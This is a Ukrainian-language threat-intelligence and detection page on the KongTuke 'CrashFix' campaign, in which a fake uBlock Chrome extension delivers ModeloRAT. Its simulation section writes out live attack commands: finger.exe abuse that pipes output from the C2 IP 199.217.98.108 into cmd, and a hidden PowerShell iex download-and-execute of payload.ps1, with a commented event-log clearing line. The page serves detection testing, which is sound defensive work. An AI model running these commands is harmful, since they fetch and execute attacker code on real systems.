Розбір CrashFix: Нова іграшка від KongTuke
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
KongTuke розповсюджував шкідливе розширення Chrome, NexShield, яке імітує uBlock Origin Lite. Після встановлення воно відображає попередження безпеки “CrashFix”, щоб змоделювати справжній інцидент безпеки браузера, викликає збій браузера і змушує користувача виконати шкідливу команду PowerShell, скопійовану в буфер обміну. Кампанія розгортає Python RAT, ModeloRAT, на системах, підключених до домену, і кількаетапну ланцюжок PowerShell на автономних хостах.
Розслідування
Аналітики Huntress переглянули код розширення, пов’язали командно-контрольний центр з nexsnield.com і зворотно зняли завантажені корисні навантаження. Вони спостерігали зловживання finger.exe як LOLBin для отримання інструкцій від зловмисника, а також DGA, який генерує домени .top. У середовищах на домені дослідники ідентифікували зашифрований за допомогою RC4 Python-імплантат, що зберігається через ключ HKCU Run. Додаткові методи включали обійти AMSI, і тактики виснаження ресурсів, призначені для тиску на користувачів з метою швидкого повного дотримання.
Захист
Блокуйте ID розширення Chrome і стежте за невідомими розширеннями, які видають себе за популярні блокувальники реклами. Виявляйте підключення до nexsnield.com, IP-адрес C2 і доменів, створених DGA. Використовуйте контроль виконання для обмеження використання LOLBin (включаючи finger.exe) і попереджайте про підозрілі значення ключів Run, особливо ті, що схожі на широко використовуване програмне забезпечення.
Відповідь
Попереджайте про встановлення розширень, пов’язаних з NexShield, і співвідносіть із зовнішніми з’єднаннями до виявленої інфраструктури C2 і DGA. Ізолюйте уражені хости та збирайте артефакти розширення, ключі реєстру Run, заплановані завдання та вилучені файли. Видаліть персистентність ModeloRAT, знищіть компоненти PowerShell-етапу, та відновіть і перевірте кінцеву точку.
Потік Атаки
Детекції
Виклик підозрілих методів .NET із Powershell (через powershell)
Переглянути
Підозріле використання CURL (через cmdline)
Переглянути
Коротка назва файлу (через cmdline)
Переглянути
Можливе ручне або сценарійоване виконання в незвичайних папках (через cmdline)
Переглянути
Підозрілі рядки Powershell (через powershell)
Переглянути
Виклик підозрілих функцій Windows API з Powershell (через powershell)
Переглянути
Можливі точки постійності [ASEPs – Software/NTUSER Hive] (через registry_event)
Переглянути
Архів був розпакований у підозрілу директорію за допомогою Powershell (через powershell)
Переглянути
Виконання Python з підозрілих папок (через cmdline)
Переглянути
Можливі індикатори обфускації Powershell (через powershell)
Переглянути
Можливе системне перерахування (через cmdline)
Переглянути
Завантаження або вивантаження через Powershell (через cmdline)
Переглянути
IOCs (SourceIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (HashSha256) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (DestinationIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
IOCs (Emails) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke
Переглянути
Виявлення виконання шкідливих команд KongTuke CrashFix [Windows Process Creation]
Переглянути
Виявлення обходу AMSI та видалення слідів за допомогою PowerShell [Windows Powershell]
Переглянути
Виконання симуляції
Передумови: Телеметрія та перевірка бази повинні пройти.
Обґрунтування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначене для спрацьовування правила виявлення. Команди та опис ОБОВ’ЯЗКОВО повинні прямо відображати певні TTP та мають на меті створення саме тієї телеметрії, яку очікує логіка виявлення.
-
Розповідь про атаку та команди:
Зловмисник спочатку копіює легітимнийfinger.exeбінарний файл у тимчасову папку, перейменовуючи його наct.exe, а потім використовує вкладенийcmd /cланцюг, щоб викликати скопійований бінарний файл із підробленим аргументом, що контактує з віддаленим C2-сервером (199.217.98.108). Бінарний файл передає корисне навантаження назад у командний рядок, яке потім передається в другий прихованийcmdщо виконує отриманий код. Після цього зловмисник використовує PowerShell для завантаження вторинного корисного навантаження за допомогоюInvoke‑WebRequestі негайно виконує це за допомогоюiex. Усі кроки виконуються з мінімальним UI (/min) щоб уникнути виявлення користувачем.1. Копіювати finger.exe → %TEMP%ct.exe 2. Запустити: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Завантаження PowerShell і виконання вторинного корисного навантаження: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Скрипт регресійного тесту: Нижченаведений скрипт відтворює повний ланцюжок атаки на тестовій машині Windows. Виконайте його в підвищеній Powershell сесії.
#------------------------------------------------- # Виконання шкідливих команд KongTuke CrashFix #------------------------------------------------- # 1. Розгорніть LOLBin (finger.exe) у %TEMP% як ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Виконання шкідливого cmd-ланцюга (відповідає правилу Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Завантаження та виконання вторинного корисного навантаження через PowerShell $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Команди очищення: Віджаліть залишки і зупиніть усі процеси, що залишилися після тесту.
# Видалити скопійований ct.exe Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Завершити будь-які зайві процеси cmd.exe або powershell.exe, започатковані тестом (фільтрація за конкретною командною лінією) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # За бажанням: очистити Журнал подій, якщо це потрібно для повторюваності # wevlutil cl Security